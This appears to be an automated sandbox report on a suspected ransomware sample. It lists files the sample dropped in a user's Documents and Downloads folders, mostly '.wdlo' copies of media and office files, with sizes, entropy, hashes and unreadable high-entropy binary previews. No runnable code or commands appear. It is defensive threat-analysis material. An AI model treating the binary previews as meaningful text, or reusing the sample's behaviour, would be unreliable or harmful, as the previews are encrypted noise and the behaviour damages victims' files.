                  Preview:WHZAG.*qL..t8...Q...k.V...%=.....x.&.e..... c..7m..{.....'...Y.a.....)Qv.n..F...uh..=P."-.`...o.......{.mU....?v...&3.i]&.B.1..y...V.z[,.T......."..h.r.....*zk!.q.&.....Pk.`.l....T.G..u.Ha!..$w..N...D...y....S....i......P/.^..%.n..,....y=/.....YJ=Z.4p4...;.Y.=7....t..33.....*.v.[e....*7..s$_4....Zy.M...a.*...".0.Lz8q.W.h[!`!K.....}X.?..)i!.. ....JfI.f...|.p.=.w.,."=d.x&b!L}.v...5.2N..(.:.]....-[..l.x.*.%.3.k..m47.0.(.d.S.t.Bk.._..@w.N..`Y.p. X.....%.J.j..?.$3......_..._..SbK.!4.'e..E7).Y&0..zf.a.j'...E..v..E).L.p....%.".xK..[36..w...\kg...@..:.X.W.....AfvoY....1...../.#O.o%..#.(.r.....C..W:mE.V.$...+{.g../=.T.k!.+..$............J.Y....".....T{.D..V.F.....n.../...Mki.....KpX..X.X.....N.....}.9%..f....."..s...w.N...S....n...v)..~;G..T..........\.x.@.P..).2.........N.}......m|z...4.P...t"....w.....KJ`.U.X..].!..|..7.~jg.$..N...Y.....Lm.....).........W......q.J.}..3..s.....l_h..Cx..aN...!f......Jje..X.E..s......>..?..S... ...q.hYN..#...

                  C:\Users\user\Documents\WHZAGPPPLA.mp3.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.849703590430887
                  Encrypted:false
                  SSDEEP:24:KECZ023mto18SJWjvWghUwTrMZH/wNpnXNvo6iCiG2vSKVogt9b6u9cxsER3zbD:KCgXDJcWgeqrKHYNI6YVdtKyER3nD
                  MD5:EED2D4A0024058C413D84FAE1D54EDA5
                  SHA1:37ABCC77013336C1A0B05AB44776EA6E0DD1A1EE
                  SHA-256:72BDDBDCFB048D27E1F5599EE9947EC0AEFF7D9108034DBF2604AD7D2ACAAE28
                  SHA-512:3CF8991FC1D64333843D2673B7968F2526D99BE37453AF2BFC83386365CC5F698BBBC1465683EC6D5BCB21075D37773738EE4DA35F3C5A0ACCD50491B2FB17C1
                  Malicious:false
                  Preview:WHZAG.*qL..t8...Q...k.V...%=.....x.&.e..... c..7m..{.....'...Y.a.....)Qv.n..F...uh..=P."-.`...o.......{.mU....?v...&3.i]&.B.1..y...V.z[,.T......."..h.r.....*zk!.q.&.....Pk.`.l....T.G..u.Ha!..$w..N...D...y....S....i......P/.^..%.n..,....y=/.....YJ=Z.4p4...;.Y.=7....t..33.....*.v.[e....*7..s$_4....Zy.M...a.*...".0.Lz8q.W.h[!`!K.....}X.?..)i!.. ....JfI.f...|.p.=.w.,."=d.x&b!L}.v...5.2N..(.:.]....-[..l.x.*.%.3.k..m47.0.(.d.S.t.Bk.._..@w.N..`Y.p. X.....%.J.j..?.$3......_..._..SbK.!4.'e..E7).Y&0..zf.a.j'...E..v..E).L.p....%.".xK..[36..w...\kg...@..:.X.W.....AfvoY....1...../.#O.o%..#.(.r.....C..W:mE.V.$...+{.g../=.T.k!.+..$............J.Y....".....T{.D..V.F.....n.../...Mki.....KpX..X.X.....N.....}.9%..f....."..s...w.N...S....n...v)..~;G..T..........\.x.@.P..).2.........N.}......m|z...4.P...t"....w.....KJ`.U.X..].!..|..7.~jg.$..N...Y.....Lm.....).........W......q.J.}..3..s.....l_h..Cx..aN...!f......Jje..X.E..s......>..?..S... ...q.hYN..#...

                  C:\Users\user\Documents\WSHEJMDVQC.jpg

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.858418416704899
                  Encrypted:false
                  SSDEEP:24:0PzUF4JBO6j3ae7fpeB6PL1goN19lzJwoBARNQ0f0/HiFFK5gvsKn8TS00I5NoTF:0CX67cwL1gor9lzD+RNb0/0FK6fiSTI2
                  MD5:152E641D22710E1D8C59DC915CB49218
                  SHA1:36BC7252A6141212429AE72E6BF72C5E490A8070
                  SHA-256:8BD598B92AF3F8307847B30730FC46F17996C8F6BE0D2B7B479CD165A1AD99D5
                  SHA-512:4E8C42035D99CBEB77AE84DD48AB485A786217F752D2349C394543F7373924283C50FC7226B4E77482D0B80746B597DBDBBF7FB870F79FE44E3B09218EB24CEF
                  Malicious:false
                  Preview:WSHEJz!Od.....v..v.I......Y..2 Z..........k~.Z8.Mw.....;....NZ...c...l.#..1...[....#<^.d.0o}J..-..C;.a...&.X....i.phZ....Z..n\.ti, s...H..g.a.._..%... !=..Fh."](......P....70o.I...MW..i...X.Om.....4@6U*fB.!.4....$.64z........9#c.S...h......tp...qFm'(A3...@....x..............n....2o*....F.. HE........0..c. A..~y.o.....r...p.u...FA......r......_!.Pb....Pb..oc....!C9/....[2B.....".S.m..V.J4.6'.<..~H..n.._....M.\N.5.....Q..%(.kv.$..o+..E.~.M.{.f.Z..?!..w.V.......W..+..<.N.0..I...A..-L...6;9..My....5H....p......?..=\........&R.....V9....S..;.w....+..Ph&..<R.U....../.m.....XcN@.o..I.s.U..6.{.cJ.9_.z.'Km.u.5g....@.J...U<..{Y...AO...n.....@...P#}m/..!k...S..:.9E..."..O2j4@....... ...=..Z.*.y+..8-......#V...;...)./.U.....{...{{ ....qD..7...5..d...@;.*D..X..;..5..y.Wx..0..h\.... .!,...;... .....9......Y.......7>..T.?k0q..D.....6&uJ..'.-/Nzk%9.".z+v..7o...Q^.P......A.>...P.<..$.f.%r.Zp..xs...[?q....o... .A$.@ch.K.<!{Z.9.d:!.j+...'.e...N...B.....

                  C:\Users\user\Documents\WSHEJMDVQC.jpg.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.858418416704899
                  Encrypted:false
                  SSDEEP:24:0PzUF4JBO6j3ae7fpeB6PL1goN19lzJwoBARNQ0f0/HiFFK5gvsKn8TS00I5NoTF:0CX67cwL1gor9lzD+RNb0/0FK6fiSTI2
                  MD5:152E641D22710E1D8C59DC915CB49218
                  SHA1:36BC7252A6141212429AE72E6BF72C5E490A8070
                  SHA-256:8BD598B92AF3F8307847B30730FC46F17996C8F6BE0D2B7B479CD165A1AD99D5
                  SHA-512:4E8C42035D99CBEB77AE84DD48AB485A786217F752D2349C394543F7373924283C50FC7226B4E77482D0B80746B597DBDBBF7FB870F79FE44E3B09218EB24CEF
                  Malicious:false
                  Preview:WSHEJz!Od.....v..v.I......Y..2 Z..........k~.Z8.Mw.....;....NZ...c...l.#..1...[....#<^.d.0o}J..-..C;.a...&.X....i.phZ....Z..n\.ti, s...H..g.a.._..%... !=..Fh."](......P....70o.I...MW..i...X.Om.....4@6U*fB.!.4....$.64z........9#c.S...h......tp...qFm'(A3...@....x..............n....2o*....F.. HE........0..c. A..~y.o.....r...p.u...FA......r......_!.Pb....Pb..oc....!C9/....[2B.....".S.m..V.J4.6'.<..~H..n.._....M.\N.5.....Q..%(.kv.$..o+..E.~.M.{.f.Z..?!..w.V.......W..+..<.N.0..I...A..-L...6;9..My....5H....p......?..=\........&R.....V9....S..;.w....+..Ph&..<R.U....../.m.....XcN@.o..I.s.U..6.{.cJ.9_.z.'Km.u.5g....@.J...U<..{Y...AO...n.....@...P#}m/..!k...S..:.9E..."..O2j4@....... ...=..Z.*.y+..8-......#V...;...)./.U.....{...{{ ....qD..7...5..d...@;.*D..X..;..5..y.Wx..0..h\.... .!,...;... .....9......Y.......7>..T.?k0q..D.....6&uJ..'.-/Nzk%9.".z+v..7o...Q^.P......A.>...P.<..$.f.%r.Zp..xs...[?q....o... .A$.@ch.K.<!{Z.9.d:!.j+...'.e...N...B.....

                  C:\Users\user\Documents\WSHEJMDVQC.xlsx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.850584066264345
                  Encrypted:false
                  SSDEEP:24:7L055iXBX2Jhqs/e7JcjxjWZ5ZadSTz/cttr80JYYoO46DnnIZbNxdgZ9IDEU3zX:FXKhCKjNWZ5wdizotrkxRennGfyZy4UT
                  MD5:5FF2DF6223A157CB2815EB89FA4F5665
                  SHA1:87451811523587A3EBD4E3EAC1E9EA6E9495218B
                  SHA-256:48B0399004976147760166C506D2F0E18EFFCB2664597C9DF140B4AA89987DFB
                  SHA-512:9EE82A99A0E31C0E412801231CDC0EF7E4E50B3A656F51766AF4F36D749DBAE654E1A2322C5C5A9A0BFD662E177835BEF60BD0A4CD449B463C68A5F7DAE3F0D6
                  Malicious:false
                  Preview:WSHEJ.I.........\.....$..3z..7..2.&a..c/q|....a.<..B....Mj...4...s.'.'....f..S.....&6@...J6......./..e...mk<.3....5....]..d_.T.....3....k..|..I...SP....l....u....6%*.0<O..~..jXn........E..T0.{t..<.X]..f?%..XX.t@3.....u..4+[}..x.......F{%Y.PKE...[C......Z@..C..4.#..C.n}.o..[.`.X..xm.{.."..i....q...*)....y.Hc....`.%_.d..T.c..Bm?..I...z2C..*k@..:$^.F....p.\......i......i....A..YEx.o........~.T..+......z....c.U.....x,.z.K]w.).vOf&.....X.BT.Z..!.z.<.n.%V..ax^0o...{.4...A..K.5`.C...t._N..O.W-"ME..Y...K...V..n.TO....#.....+.K.%...WP.`?..S.c...$k..Y.l1.9v......-..?P..k....Qx.=....V l.....q..nt<...P.......E..J......l.....#t..#...iA..PP...7;B.k.!r1......P......._I.r....+..{aeV.sI..4R.|.P(`.0%...z"...w.Rl..$.@....O.YF/.......8NQp.VB.P.v...2t.-..j../.N.&?.. ....H..b{.$....B...)(.#M%....#Iw.....8nH>..*_...v.A.[..l.+.I.......!.7B...RO....U............]...o...iC.5..^;.p..*......$.......YBt.J..n.`......#.u.....}...yPs.Q..Ub....0.tkN5-.SW.b..D

                  C:\Users\user\Documents\WSHEJMDVQC.xlsx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.850584066264345
                  Encrypted:false
                  SSDEEP:24:7L055iXBX2Jhqs/e7JcjxjWZ5ZadSTz/cttr80JYYoO46DnnIZbNxdgZ9IDEU3zX:FXKhCKjNWZ5wdizotrkxRennGfyZy4UT
                  MD5:5FF2DF6223A157CB2815EB89FA4F5665
                  SHA1:87451811523587A3EBD4E3EAC1E9EA6E9495218B
                  SHA-256:48B0399004976147760166C506D2F0E18EFFCB2664597C9DF140B4AA89987DFB
                  SHA-512:9EE82A99A0E31C0E412801231CDC0EF7E4E50B3A656F51766AF4F36D749DBAE654E1A2322C5C5A9A0BFD662E177835BEF60BD0A4CD449B463C68A5F7DAE3F0D6
                  Malicious:false
                  Preview:WSHEJ.I.........\.....$..3z..7..2.&a..c/q|....a.<..B....Mj...4...s.'.'....f..S.....&6@...J6......./..e...mk<.3....5....]..d_.T.....3....k..|..I...SP....l....u....6%*.0<O..~..jXn........E..T0.{t..<.X]..f?%..XX.t@3.....u..4+[}..x.......F{%Y.PKE...[C......Z@..C..4.#..C.n}.o..[.`.X..xm.{.."..i....q...*)....y.Hc....`.%_.d..T.c..Bm?..I...z2C..*k@..:$^.F....p.\......i......i....A..YEx.o........~.T..+......z....c.U.....x,.z.K]w.).vOf&.....X.BT.Z..!.z.<.n.%V..ax^0o...{.4...A..K.5`.C...t._N..O.W-"ME..Y...K...V..n.TO....#.....+.K.%...WP.`?..S.c...$k..Y.l1.9v......-..?P..k....Qx.=....V l.....q..nt<...P.......E..J......l.....#t..#...iA..PP...7;B.k.!r1......P......._I.r....+..{aeV.sI..4R.|.P(`.0%...z"...w.Rl..$.@....O.YF/.......8NQp.VB.P.v...2t.-..j../.N.&?.. ....H..b{.$....B...)(.#M%....#Iw.....8nH>..*_...v.A.[..l.+.I.......!.7B...RO....U............]...o...iC.5..^;.p..*......$.......YBt.J..n.`......#.u.....}...yPs.Q..Ub....0.tkN5-.SW.b..D

                  C:\Users\user\Downloads\AQRFEVRTGL.mp3

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.851867953635999
                  Encrypted:false
                  SSDEEP:24:V1p89Tyj3p6zrqW78pv2XdiN8Y/EoIN1ap0X3hEgCLRZF2dqum3zbD:V1poQ3sjQpqY7/EoIN4p7r3nD
                  MD5:121C1EEAE3E74F3996589C52E78E85EF
                  SHA1:A8DD9FFA7C494B9310D759FD81DFAD97A259E573
                  SHA-256:F1FA662F5EDA5EBA859F351DE8F1038ED576F3042F030EF8B7DF1EA0EFA31D92
                  SHA-512:2F1488B3E3E980B6C25B99154C57B6C989BB4046C7280ABE5FAF1B7A03F1AED6A08B62420FDD215AFF7B6009FBF53536712B36BC3DE35DA5E9870A3433BFD242
                  Malicious:false
                  Preview:AQRFE:..-6...J.....A..8..o..4n.....%,.{..&..tN].>7+_....%..z..%.B!......d\...w......3.%Z.K..h61..<.E.jU..zI1(..c........e.)...F.V.<....Z.v.#Cha...U...*......q....e..<......(^...?.+., .[N.....A..V...1kd....^..i".[..Y....H.....M..jG...&h..rlH.$..CN.4.Y-..M..X..H..B..-......R.#..mQ.9.i/...+...O..a....p8..e.:..c.^z5.x.S.".`}x.~...8.QeG.y..}f:Co{..XM.'....?..d......s}.....?`g.xF....+.4..q#U...M.J0..1.V..../cZ4.....eM......q.L....t..w....[}.O.Y.u..".).*..#....h..(.1.6lTI.r..r#x.g......}x.....C.Z.d..(...x.\sYdaOW.z..a...O.......mJ....T.....i....)..G.c....Tc.l....O5'3...W.Um.s..........B>G-q.X.@...Je!........1x...?.EE....%L.....B.kh.J..o.}.<zL.._...q.......).!.*3..f..4\"..... u.:..Z.4~W`.?.@.....0.......N.8.[...S.x.q...B.%=.DE&.n.A.b.?7[.......j.f.}..=?.x.m....vOE.. ....y.\g.E..h..._..fS.\;._....j;........).a...9)^...KG.l>..z.jT"l.T...qC:2.v7[.S......hk......v..]`..<J*....Cf.fZ..g..Q.T..D.....z&r.?..p..]K.,.Bi)..]>....=.....U...V

                  C:\Users\user\Downloads\AQRFEVRTGL.mp3.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.851867953635999
                  Encrypted:false
                  SSDEEP:24:V1p89Tyj3p6zrqW78pv2XdiN8Y/EoIN1ap0X3hEgCLRZF2dqum3zbD:V1poQ3sjQpqY7/EoIN4p7r3nD
                  MD5:121C1EEAE3E74F3996589C52E78E85EF
                  SHA1:A8DD9FFA7C494B9310D759FD81DFAD97A259E573
                  SHA-256:F1FA662F5EDA5EBA859F351DE8F1038ED576F3042F030EF8B7DF1EA0EFA31D92
                  SHA-512:2F1488B3E3E980B6C25B99154C57B6C989BB4046C7280ABE5FAF1B7A03F1AED6A08B62420FDD215AFF7B6009FBF53536712B36BC3DE35DA5E9870A3433BFD242
                  Malicious:false
                  Preview:AQRFE:..-6...J.....A..8..o..4n.....%,.{..&..tN].>7+_....%..z..%.B!......d\...w......3.%Z.K..h61..<.E.jU..zI1(..c........e.)...F.V.<....Z.v.#Cha...U...*......q....e..<......(^...?.+., .[N.....A..V...1kd....^..i".[..Y....H.....M..jG...&h..rlH.$..CN.4.Y-..M..X..H..B..-......R.#..mQ.9.i/...+...O..a....p8..e.:..c.^z5.x.S.".`}x.~...8.QeG.y..}f:Co{..XM.'....?..d......s}.....?`g.xF....+.4..q#U...M.J0..1.V..../cZ4.....eM......q.L....t..w....[}.O.Y.u..".).*..#....h..(.1.6lTI.r..r#x.g......}x.....C.Z.d..(...x.\sYdaOW.z..a...O.......mJ....T.....i....)..G.c....Tc.l....O5'3...W.Um.s..........B>G-q.X.@...Je!........1x...?.EE....%L.....B.kh.J..o.}.<zL.._...q.......).!.*3..f..4\"..... u.:..Z.4~W`.?.@.....0.......N.8.[...S.x.q...B.%=.DE&.n.A.b.?7[.......j.f.}..=?.x.m....vOE.. ....y.\g.E..h..._..fS.\;._....j;........).a...9)^...KG.l>..z.jT"l.T...qC:2.v7[.S......hk......v..]`..<J*....Cf.fZ..g..Q.T..D.....z&r.?..p..]K.,.Bi)..]>....=.....U...V

                  C:\Users\user\Downloads\AQRFEVRTGL.pdf

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.859992572832301
                  Encrypted:false
                  SSDEEP:24:VzQhRKNMxXb0AB66mKlfdqzI2Zp7lrrvcAyJ6Jn5jr3v4EiY3zbD:VzmRKNMxYB6lfdt2f71dyJ0RLgO3nD
                  MD5:6876A5EEB1BB166083BC9A67EE922223
                  SHA1:22FCE6F7CAD40153FD0C11242F6DDCA438E128F8
                  SHA-256:E451EF3EC3CD66C94D4D36B542511C70C88B776B13DF444F710475BB69FF0699
                  SHA-512:AFA445EDC89639AEDF7F7675B0F8F9800B3D4A6EB686131E956BAF1E737E96C2FA1D2694DD5EF16A16FECB879FE06B1F0660ECDF37D2E91BD2609E36C6176C58
                  Malicious:false
                  Preview:AQRFE......t....L.. ..tvX;.i.....1.sBqGA%.r..%|r%l.V.T..J..y....;..f....N=YZ...`.l&p....l......}h....K.J6.e./.|.Jt.i...._..X-.GML.G.@.+e..............s.TW....0....K...,. .1Q.P...:....1c...<.I......;...M.o.. ...P.Ql....!..z27VU`G.i= ...6X.*.@...#g.8..s..6{..z...D..;{V..f4.T}.....>...c8....`...!...U|.#..s.2~...g}..}.0YcM...0.'.i......?..2j\......'8.upW..mF....,.....B.b...^..<....8.vZ=`..a9V..3.@.O.....<..w.Z.....75.!.O.9il.M..:AT.........[{.....4.....6T.C.......O..$...brs;i..."...O.....8..R...i........t......b8bK.k-.y....f...!.{r!......4.../..j(...[5#.4...Tg..q.7.KW|.....\B....>.C..4|....TD...._..i.JU.q...@....u..?.T....T.4.i.*.....s.<.aK:.m...[.....H.../.Y.S....t.T0..............0.m.c.7Z..Ra..J.+.A.........R..Q.l.a3...h.B...|..>.@..;.T.a^..FuV..A$.d~EN.]G....{...v...g].!.t...2.U.q.vn....$C..M....".s.~.v9..5....4D.>v....*...~K...s.i..].....3.,.85..7 ....8|..M.u@.b.M....49]?..L.CB(!..B...O.{..~...+ot..e.*nQ_.[.@.z..Wt./t{.?.,p[.k.W.Kk.n.E.^.P...

                  C:\Users\user\Downloads\AQRFEVRTGL.pdf.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.859992572832301
                  Encrypted:false
                  SSDEEP:24:VzQhRKNMxXb0AB66mKlfdqzI2Zp7lrrvcAyJ6Jn5jr3v4EiY3zbD:VzmRKNMxYB6lfdt2f71dyJ0RLgO3nD
                  MD5:6876A5EEB1BB166083BC9A67EE922223
                  SHA1:22FCE6F7CAD40153FD0C11242F6DDCA438E128F8
                  SHA-256:E451EF3EC3CD66C94D4D36B542511C70C88B776B13DF444F710475BB69FF0699
                  SHA-512:AFA445EDC89639AEDF7F7675B0F8F9800B3D4A6EB686131E956BAF1E737E96C2FA1D2694DD5EF16A16FECB879FE06B1F0660ECDF37D2E91BD2609E36C6176C58
                  Malicious:false
                  Preview:AQRFE......t....L.. ..tvX;.i.....1.sBqGA%.r..%|r%l.V.T..J..y....;..f....N=YZ...`.l&p....l......}h....K.J6.e./.|.Jt.i...._..X-.GML.G.@.+e..............s.TW....0....K...,. .1Q.P...:....1c...<.I......;...M.o.. ...P.Ql....!..z27VU`G.i= ...6X.*.@...#g.8..s..6{..z...D..;{V..f4.T}.....>...c8....`...!...U|.#..s.2~...g}..}.0YcM...0.'.i......?..2j\......'8.upW..mF....,.....B.b...^..<....8.vZ=`..a9V..3.@.O.....<..w.Z.....75.!.O.9il.M..:AT.........[{.....4.....6T.C.......O..$...brs;i..."...O.....8..R...i........t......b8bK.k-.y....f...!.{r!......4.../..j(...[5#.4...Tg..q.7.KW|.....\B....>.C..4|....TD...._..i.JU.q...@....u..?.T....T.4.i.*.....s.<.aK:.m...[.....H.../.Y.S....t.T0..............0.m.c.7Z..Ra..J.+.A.........R..Q.l.a3...h.B...|..>.@..;.T.a^..FuV..A$.d~EN.]G....{...v...g].!.t...2.U.q.vn....$C..M....".s.~.v9..5....4D.>v....*...~K...s.i..].....3.,.85..7 ....8|..M.u@.b.M....49]?..L.CB(!..B...O.{..~...+ot..e.*nQ_.[.@.z..Wt./t{.?.,p[.k.W.Kk.n.E.^.P...

                  C:\Users\user\Downloads\AQRFEVRTGL.xlsx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.86128632877642
                  Encrypted:false
                  SSDEEP:24:VNzC5LQpyzcFYQ5kPRAXy4Ac2QGpEJjkvhQuuTK4o+ZG13ls6jPAEq3zbD:VduLbNQCZyA5XthQuuO4oTQ7n3nD
                  MD5:5A517572C8501D917E610250DF3375D2
                  SHA1:AD6343667C45184DE081839AFA010DAE918F1404
                  SHA-256:C342CD1397B3ECA85EC0C475587338D58DAC00ABF1A54437BED10FF18E55AFD8
                  SHA-512:741D28FCC8EFF722EAD638EA2503B3B9D299BF1C6B2E6256071113C347D05B334994384463D5157E646E1CB06658B9381C250CF0E291B67CF34B94F761903D6B
                  Malicious:false
                  Preview:AQRFE!I.r.f.F6....t.~..[.9@.Z.W.....O..>%h.-.Va....t..W..OR..M..m....3r;..0.)........4ROR..N.R}.2....[2.u...j.[.J.........a.............._W]...`.x...T..m(.....j....35...$Xw...t..W...Z.>o...L..R..#.i.)A..,8}.^...@...%r.Z.m.D....o.k..ai.+..g....dh..{.E....}....z..(.z7.......#........G^....*.)...mB.....N."Q..l.Mor..{u..gT.p.....?..w.9..-.d..wx:..S........8...]y_.(D..d...E..o.T..f..dw.....W%_z..U<............G@X^.l..i&....I..A.. >.T.....2.`.V+..g~]..&..........r....7..M...z.\.n0?.OP....>.q....]...2.`......D...p5..3..8.......7..Q.......l.....\-."...q....T.T0$...i...>1b....o?w".<_.K0.7FO6.7d1...1.....1.z....rM\..U....2..j..U....vy.%.J..+w..s.S.....@at/....+..NT...S..f%76.7.)@. .ec..Tp..-.0.<.A73.e.h..Y....P.ay.rg....UY..l...M...1....-.....V.{TXk.Y.R.Z`@n...l.B_t.]&.|Y.=.o.D....D..k^.... .l...Ae.[..D..C.A..H.#q.G3!.....:h.#...h.... {c..A..z.pU.F.i......j;oWk.Ej/C9...Rg.0....0..8..SpP..S.$[~.W.......jg#....=...L._..'.h.z......#....>...p5...v.

                  C:\Users\user\Downloads\AQRFEVRTGL.xlsx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.86128632877642
                  Encrypted:false
                  SSDEEP:24:VNzC5LQpyzcFYQ5kPRAXy4Ac2QGpEJjkvhQuuTK4o+ZG13ls6jPAEq3zbD:VduLbNQCZyA5XthQuuO4oTQ7n3nD
                  MD5:5A517572C8501D917E610250DF3375D2
                  SHA1:AD6343667C45184DE081839AFA010DAE918F1404
                  SHA-256:C342CD1397B3ECA85EC0C475587338D58DAC00ABF1A54437BED10FF18E55AFD8
                  SHA-512:741D28FCC8EFF722EAD638EA2503B3B9D299BF1C6B2E6256071113C347D05B334994384463D5157E646E1CB06658B9381C250CF0E291B67CF34B94F761903D6B
                  Malicious:false
                  Preview:AQRFE!I.r.f.F6....t.~..[.9@.Z.W.....O..>%h.-.Va....t..W..OR..M..m....3r;..0.)........4ROR..N.R}.2....[2.u...j.[.J.........a.............._W]...`.x...T..m(.....j....35...$Xw...t..W...Z.>o...L..R..#.i.)A..,8}.^...@...%r.Z.m.D....o.k..ai.+..g....dh..{.E....}....z..(.z7.......#........G^....*.)...mB.....N."Q..l.Mor..{u..gT.p.....?..w.9..-.d..wx:..S........8...]y_.(D..d...E..o.T..f..dw.....W%_z..U<............G@X^.l..i&....I..A.. >.T.....2.`.V+..g~]..&..........r....7..M...z.\.n0?.OP....>.q....]...2.`......D...p5..3..8.......7..Q.......l.....\-."...q....T.T0$...i...>1b....o?w".<_.K0.7FO6.7d1...1.....1.z....rM\..U....2..j..U....vy.%.J..+w..s.S.....@at/....+..NT...S..f%76.7.)@. .ec..Tp..-.0.<.A73.e.h..Y....P.ay.rg....UY..l...M...1....-.....V.{TXk.Y.R.Z`@n...l.B_t.]&.|Y.=.o.D....D..k^.... .l...Ae.[..D..C.A..H.#q.G3!.....:h.#...h.... {c..A..z.pU.F.i......j;oWk.Ej/C9...Rg.0....0..8..SpP..S.$[~.W.......jg#....=...L._..'.h.z......#....>...p5...v.

                  C:\Users\user\Downloads\BWDRWEEARI.png

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.837948269925807
                  Encrypted:false
                  SSDEEP:24:EHrdLkmpLgGsiwpT3HERSA6X0JUa6Ea6gpNxZYK98KVvABHQtP5Myv/gi0QGv93D:ELdLkmpE7i+Vza671plYKeKxA6jMygiW
                  MD5:B9B00A51099AFC0F0DA86627BC012CDA
                  SHA1:C680E8B486314DD04CA1F5A108FF27E022F965CC
                  SHA-256:D5A0561756BB18712198F2BEA80F2649FDCA84F97BD6FC0F51FEDEE0BD6CFE5F
                  SHA-512:EF20CB940BC3DA12895D1CE4C676E10744E834F865C5748D27C822B2D4140BCB90A7366FB4D079631D0A468F4F953FA6FB189CFCEC46AE7BA396811168EAC832
                  Malicious:false
                  Preview:BWDRWH.!..e-/h.:..@.:=-{\.[.',..>E.>....%.^...4&..O.......J.M..yp....0..W......%...._+.I..].J.8.....a..8$..E...9{G..I.4.......OV.."..3.p.7fF..|`..^....K(J.....,......Yy..N...P..Dq..y..0 .....y.|1 ......uvre..,.]...I..D...>../Yu..|.Iu.01.D.>d..q.a.y...~.G.j~.Y^.-..t.U...T.O.....&........k.. &.\...-.%.`.O.?z=.....U...tx.m}.Y=.*.O..rV......<w....".W...8..._=.G.c.......W..:.....=.d.mY.l.#._L....X.X..y-.M..as<.x V..k.+..qC.6....c...S+ ..8...G.......T.T'D2=.?.^.O&...).=wa...i.h..X|\5Qc.6.Y..s[..`,w...jo...F.%;G......1..=.....Bt.......%....N..z..US..-\..'N"...KR.....9%f2T....|...........T.....x?IA.dFR.l.H.<B...........'..R.:"..9@...MS....{.s.. ....I.d'.....:`;.o.M../....^."*.#......{.G..`yZi....*F$`...*....s.].Rt...C.5.o...vM..$.F.~......iC....`\.....$...w....4?..?.a...z7..o~.o5..rBl.0..,.2....P.......Z.[...W....F.c.]f.. .g....{n..z..'./.../.s.....y_y.-.....L..`e.%P....z..../..Ubxk.w....>.g..U....*..k.D.WQ.V.sw^s-.0fJ...V..OA..'9.h.)..

                  C:\Users\user\Downloads\BWDRWEEARI.png.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1360
                  Entropy (8bit):7.837948269925807
                  Encrypted:false
                  SSDEEP:24:EHrdLkmpLgGsiwpT3HERSA6X0JUa6Ea6gpNxZYK98KVvABHQtP5Myv/gi0QGv93D:ELdLkmpE7i+Vza671plYKeKxA6jMygiW
                  MD5:B9B00A51099AFC0F0DA86627BC012CDA
                  SHA1:C680E8B486314DD04CA1F5A108FF27E022F965CC
                  SHA-256:D5A0561756BB18712198F2BEA80F2649FDCA84F97BD6FC0F51FEDEE0BD6CFE5F
                  SHA-512:EF20CB940BC3DA12895D1CE4C676E10744E834F865C5748D27C822B2D4140BCB90A7366FB4D079631D0A468F4F953FA6FB189CFCEC46AE7BA396811168EAC832
                  Malicious:false
